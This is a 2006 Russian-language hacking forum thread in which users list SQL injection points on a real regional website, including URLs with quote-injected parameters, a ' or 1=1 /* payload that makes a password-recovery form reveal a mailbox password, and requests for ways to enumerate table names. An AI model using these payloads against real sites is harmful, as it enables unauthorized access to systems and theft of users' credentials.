HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Mysql-inj?
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Mysql-inj?
  #1  
Старый 13.04.2006, 12:28
Laggi
Познающий
Регистрация: 19.08.2005
Сообщений: 44
С нами: 10908092

Репутация: 2
По умолчанию Mysql-inj?
http://www.63.ru/forum/forum.php?cmd=supergrass&id='
Выдает ошибку...
Ну ясно - не отсеивается ' в запросах... что-нить глубже получится у кого-нить раскопать? У мну не получилось О_о
Гм.. там баг в таких почти везде запросах...
http://www.63.ru/forum/forum.php?cmd=supergrass&id=195438&type='
http://63.ru/poll/stat.php?anketa='
Это в селектах...
В голосовалке таже фигня в апдейте...
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 13.04.2006, 15:45
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
С нами: 10937126

Репутация: 1316


По умолчанию
во всех сайтах http://"$number".ru одни и теже ошибки
 
Ответить с цитированием

  #3  
Старый 13.04.2006, 17:42
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
С нами: 11269766

Репутация: 345


По умолчанию
Can't insert message id:

Это значит что запрос INSERT INTO, а многострадальный UNION работает лишь с SELECT
 
Ответить с цитированием

  #4  
Старый 13.04.2006, 18:24
Laggi
Познающий
Регистрация: 19.08.2005
Сообщений: 44
С нами: 10908092

Репутация: 2
По умолчанию
Can't get id of forum: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' LIMIT 1' at line 1

это селект
 
Ответить с цитированием

  #5  
Старый 13.04.2006, 18:26
Deem3n®
Постоянный
Регистрация: 19.09.2005
Сообщений: 408
С нами: 10863746

Репутация: 519
Talking
И еще, если ввести в форме
__hxxp://www.63.ru/mail/mail?cmd=showforget
в качестве имени пользователя ' or 1=1 /*, то будет
Код:
Пароль от ящика ' or 1=1 /*@63.ru : blade
Не забывайте его!
 
Ответить с цитированием

  #6  
Старый 14.04.2006, 13:19
Laggi
Познающий
Регистрация: 19.08.2005
Сообщений: 44
С нами: 10908092

Репутация: 2
По умолчанию
дак вот: есть ли методика унзнавания имен таблиц или т.п.?
 
Ответить с цитированием

  #7  
Старый 14.04.2006, 17:38
fucker"ok
Познавший АНТИЧАТ
Регистрация: 21.11.2004
Сообщений: 1,137
С нами: 11298566

Репутация: 761


По умолчанию
есть. Но как-то при insert я методов не вижу. Тут рулит многострадальный union =)
 
Ответить с цитированием

  #8  
Старый 14.04.2006, 19:01
Laggi
Познающий
Регистрация: 19.08.2005
Сообщений: 44
С нами: 10908092

Репутация: 2
По умолчанию
Цитата:
Сообщение от fucker"ok  
есть. Но как-то при insert я методов не вижу. Тут рулит многострадальный union =)
да блин... тут не только в инзертах дыры! :-)
Я где-то в селекте видел...
А не мог бы подсказать ссылку или описать методику поиска названий таблиц и полей в них
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
SQL инъекция в MySQL gadjet Уязвимости 13 27.12.2005 21:06
вопрос про mySql уязвимость Kent Уязвимости 6 19.07.2005 01:01



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.